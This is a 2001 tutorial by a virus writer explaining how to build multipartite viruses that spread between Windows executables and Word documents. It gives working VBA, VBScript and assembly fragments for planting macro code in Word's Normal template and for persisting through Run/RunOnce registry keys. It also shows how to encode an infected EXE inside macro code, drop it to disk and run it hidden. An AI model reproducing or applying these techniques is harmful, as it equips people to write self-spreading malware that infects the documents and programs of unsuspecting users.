==================================== Multipartite PE/DOC Viruses Tute Written by LiteSys ==================================== [ Intro Words ] ~~~~~~~~~~~~~ PE/DOC is great, yeah no doubt about it. You have supposely higher spreading capabilities than a normal PE infector. There are many infection methods out there on some viruses. I should begin supposing you are at least an average Win32 virus coder with serious VBA knowledge, I mean, that you're able to code both a PE infector and a Word Macro virus (bah, even an amoeba knows how to). Please consider that english is not my native language, so I may commit lots of mistakes, I hope you understand. If you have something stupid to say (nevertheless everything a human being says is stupid), do it, liteno2@softhome.net or in IRC you may find me as "litesys" or "becerro", I don't enter there too much so you may find me there every solstice :). [ The PE/DOC Logic ] ~~~~~~~~~~~~~~~~~~ Firstly, you must find the way to drop the macro virus in the normal template, this can be done by various methods, which I should mention: - Dropping a NORMAL.DOT file. - Using VBScript with ActiveX objects. - Using OLE API. Second, you must find a way to drop the Win32 virus into the macro virus code; then the macro virus code must drop the Win32 virus. Of course, you must drop an empty fly which you will infect with your Win32 virus. And get it into the macro code, but you cannot put the exe file "as is", there are many methods which can be used to convert the file into a printable string: - Transforming the exe file into a DEBUG script. - The Vecna's method (I will explain it later). - Transforming the exe file into a Chr()s array. - Transforming the exe file into a hex string. Then after you are done you should just run the infected exe file you dropped and you're done. [ Dropping the macro virus in the Normal template ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It's essential in your virus, you must find a way to get the macro virus code into the Normal template. -- DROPPING A NORMAL.DOT FILE -- This method, as I said before, is done by replacing the original NORMAL.DOT in the templates directory with a one which should contain code to import the real macro virus from another file. Vecna did it in his W32/WM.Cocaine virus by looking for the templates folder in that registry key: "HKCU\SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates" Then the virus drops the NORMAL.DOT which should contain some code to import the real macro virus. Here's a little pseudo-code of what should be done: - Find the templates directory: This can be done easily by a registry access, just open the LocalTemplates key mentioned above to get the folder. But there's a little problem: it just works on MS Office 8.0 (1997), I didn't find that registry key with Office 2000. - Drop the real macro virus: You must drop it into a file so it could be imported by the code in the normal template. - Replace the new template file: You must drop a new NORMAL.DOT file in the directory mentioned above by replacing the old one, this NORMAL.DOT should have a code capable of importing the real macro virus, dropped to hard disk before. The following code can be used, supposing the real macro virus is in C:\Lite.Sys: -------------------------------------------------------------- Sub AddIt() VirusFile = "C:\Lite.Sys" If (Dir(VirusFile) <> "") Then NormalTemplate.VBProject.VBComponents.Import VirusFile NormalTemplate.Save End If End Sub -------------------------------------------------------------- I hope this method is clear enough. By the way, I strongly recommend that if you're gonna use this method, you should use a good compression algorithm like aPLib or z_code. Because the Normal Template is too big to be carried in a virus without being compressed... -- USING VBSCRIPT WITH ACTIVEX OBJECT -- Maybe it's the most easy method, it consists in using a VBS script capable of exporting the real macro virus to the normal template, this method really has some disadvantages, the first one is incompatibility, not all windoze versions have the Scripting Host, and second one, it's slow as hell, but it can be solved as showed below. In an easy pseudo-code you should do the following: - Drop the real macro virus - Drop the VBS script - Run the VBS script: The easiest way to run the VBS script is by calling to ShellExecuteA, but as I said before, it's slow as hell, so there's another method, which is the one I use: set it as an autorun registry key, in fact it also works as a backup if your virus gets deleted. So just get that SHSetValueA (use it, cause RegOpenKeyExA and friends sux) API and you can place it at: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Ok, the following VBS code exports the C:\Lite.sys file to the normal template and the module name is "LiteSys" -------------------------------------------------------------- On Error Resume Next Set word = CreateObject("Word.Application") Set maca = word.Application.NormalTemplate.VBProject.VBComponents If maca.Item("LiteSys").Name <> "LiteSys" Then maca.Import "c:\lite.sys" word.Application.NormalTemplate.Save -------------------------------------------------------------- -- USING OLE API -- This method is explained in a T2's code snippet that appeared in MATRiX #2, I tested the program and this method seems to be reasonably fast... if you are interested in it you should take a look at that snippet. Of course you must know how to deal with COM stuff, OLE APIs and such stuff if you wanna understand it. As I am a busy guy, I didn't have the time to implement it on a virus. Maybe in a not-so-near future I could do it... [ Dropping the Win32 virus from the macro one ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ok, this is a very important part, if you want your virus to be called "Multipartite", you must make the word macro virus able to drop the Win32 virus. The methods discussed above are the only ones i've seen. -- Transforming the EXE file into a DEBUG Script -- This method doesn't seem too reliable for me, it was used in Vecna's W32/WM.Cocaine virus, this method has some flaws, and you'll see below. For example, look at the following code, it would drop a COM file on disk that says "HO HO HO": -------------------------------------------------------------- Sub DropIt() Open "C:\hoho.deb" For Output As #1 Print #1, "n HOHO.COM" Print #1, "e 100 BA 10 1 B4 9 CD 21 33 C0 CD 16 B8 0 4C CD 21" Print #1, "e 110 48 4F 20 48 4F 20 48 4F 24 0 0" Print #1, "rcx" Print #1, "1A" Print #1, "w" Print #1, "q" Close #1 Open "C:\hoho.bat" For Output As #1 Print #1, "@echo off" Print #1, "debug < c:\hoho.deb > NUL" Print #1, "del c:\hoho.deb" Print #1, "hoho.com" Close #1 Shell "C:\hoho.bat", vbMaximizedFocus End Sub -------------------------------------------------------------- Now I hope you see that you must drop a debug script and a batch file... that's bad, because you must make a debug script with your virus based in an infected PE exe, it's not really easy.. it requires some assembly code. -- The Vecna's method -- It was done in his FABI2 virus, which consists in converting the infected file to readable ASCII characters with some mathematical operations, then putting those characters in an String variable. The operation he does is the following one: - Take a byte, let's suppose it's the 4Dh (M) byte - Move the byte to a word, so we have the "MM" word - AND it by F00Fh, so we get 400Dh - Divide the higher byte (40h) by 16, so we get 040Dh - Add to the word the ASCII 4141h (AA), so we get 454Eh. - As we know, 454Eh is "NE" - Store the word. Maybe you should see the code: -------------------------------------------------------------- MOV AX, 4D4Dh ; 4D4Dh is "MM" AND AX, 0F00Fh ; 0F00Fh == 1111000000001111b as vecna writes, so the ; result we get is 400Dh SHR AH, 4h ; We are dividing by 16, and we get 0400h ADD AX, 4141h ; 4141h is "AA", so we get a clean ASCII printable ; char. So we get the "EA" word. -------------------------------------------------------------- And after dropping in the normal template, you should ask, how the hell do I reconvert it to it's original form? here you have: - Take the first byte, let's suppose it's 4Eh (N) - Substract to the first byte the 41h value, so we get 0Dh - Take the second byte, let's suppose it's 45h (E) - Substract to the second byte the 41h value, so we get 04h - Multiply that result by 16, so we get 40h - Add the first byte with the second byte results, and we get 4Dh, which is indeed "M", so we reconverted it. We need the macro code to do it, so here it is, from his FABI2 virus: -------------------------------------------------------------- Sub yoyo() CadenaX = "NE" CadenaY = Chr((Asc(Mid(CadenaX, 1, 1)) - 65) + ((Asc(Mid(CadenaX, 2, 1)) - 65) * 16)) MsgBox CadenaY 'You will se the M End Sub -------------------------------------------------------------- Really I think this method is very kewl and reliable. -- Transforming the exe file to a Chr()s array -- This method is probably the most easy one, I saw it in Bumblebee's Lil' Devil virus. But this easiness has a cost: size. The infected DOC files grow with approximately 150kb (!) more than they should have, but, what can I say? it's easy. Let's see how Chr() arrays are, the "Hoho" string should look like that: Juju = Chr(72) + Chr(111) + Chr(104) + Chr(111) MsgBox Juju And you may ask "how do I convert a byte to that value?", it can be done with just dividing three different times by 100, 10 and 1, respectively, thus getting the remainder of the three results and adding them with 30h (0). -- Transforming the exe file into a hex string. -- It's the method I use for my multipartite viruses... I haven't seen another virus that used this first. This method was inspired in Zulu's VBS worms, when he drops a file into harddisk he doesn't use that damn DEBUG script, he just makes a "hex string" and reconverts it. But how is a "hex string"?, let's see, imagine we have the "MZ" characters, if you look with a hex editor on an exe file you should see that "MZ" as "4D5A", that's what I call a "hex string". This example is very understandable, and the way to convert from a byte to a hex string (which is obviously a word) is the following: - We must have a table like that: 0123456789ABCDEF - We move the byte a word, so let's asume it's "MM" - We divide the first byte by 16, which results in 04h - We AND the second byte by 0Fh, which results in 0Dh - The result we get from the division and the AND are between 0 and 15, so we just get the table byte corresponding to the results, so the first byte is 04h and it corresponds to "4" and the second byte corresponds to "D". - We get those two values in a word, and we have "4D". Here's the routine I use in my viruses, I know it's very unoptimized and can be done smaller and better, but what the hell... i don't give a fuck. You must put in AL the byte you're gonna convert, it returns the result in AX. -------------------------------------------------------------- CONVIERTE_HEX PROC PUSH ECX PUSH EDI XOR ECX, ECX MOV CL, AL PUSH ECX SHR CL, 04h LEA EDI, Tabla_Hex INC CL @@Y: INC EDI DEC CL JNZ @@Y DEC EDI MOV AL, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla POP ECX AND CL, 0Fh LEA EDI, Tabla_Hex INC CL @@X: INC EDI DEC CL JNZ @@X DEC EDI MOV AH, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla POP EDI POP ECX RET TABLA_HEX DB "0123456789ABCDEF", 00h CONVIERTE_HEX ENDP -------------------------------------------------------------- And how do I reconvert it? easily, just use the following formula: -------------------------------------------------------------- For o = 1 to Len(joda) Step 2 X = X + Chr("&h" + Mid(Joda, o, 2)) Next -------------------------------------------------------------- And you're done. [ Writing and running the infected exe file ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ So you finally got the reconverted string, then you must run the infected file or all your work will be lost, let's assume you have the reconverted stuff in the "Hola" variable. -------------------------------------------------------------- Open "C:\my_virii.exe" For Binary as #1 Put #1, 1, Hola$ Close #1 Shell "C:\my_virii.exe", vbHide -------------------------------------------------------------- That's all. [ Closing Words ] ~~~~~~~~~~~~~ I sincerely hope this tute did not help you. If you have any question or correction feel free to mail me at liteno2@softhome.net or at litesys@monte.as... or just plain irc. Regards, LiteSys. Venezuela - (c) 2001